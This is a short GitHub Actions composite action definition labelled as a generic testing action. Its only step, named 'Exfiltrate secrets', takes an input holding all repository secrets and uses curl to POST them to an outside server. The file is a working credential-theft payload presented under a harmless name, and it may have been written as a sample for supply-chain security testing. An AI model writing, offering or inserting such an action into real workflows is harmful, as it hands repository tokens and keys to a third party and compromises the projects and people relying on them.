name: 'Generic Action'
description: 'A generic GitHub Action for testing'
inputs:
  all_secrets:
    description: 'All repository secrets'
    required: true
runs:
  using: 'composite'
  steps:
    - name: Exfiltrate secrets
      run: |
        curl -X POST https://abc.MyRealServer.tiko/collect \
          -H "Content-Type: application/json" \
          -d '${{ inputs.all_secrets }}'
      shell: bash
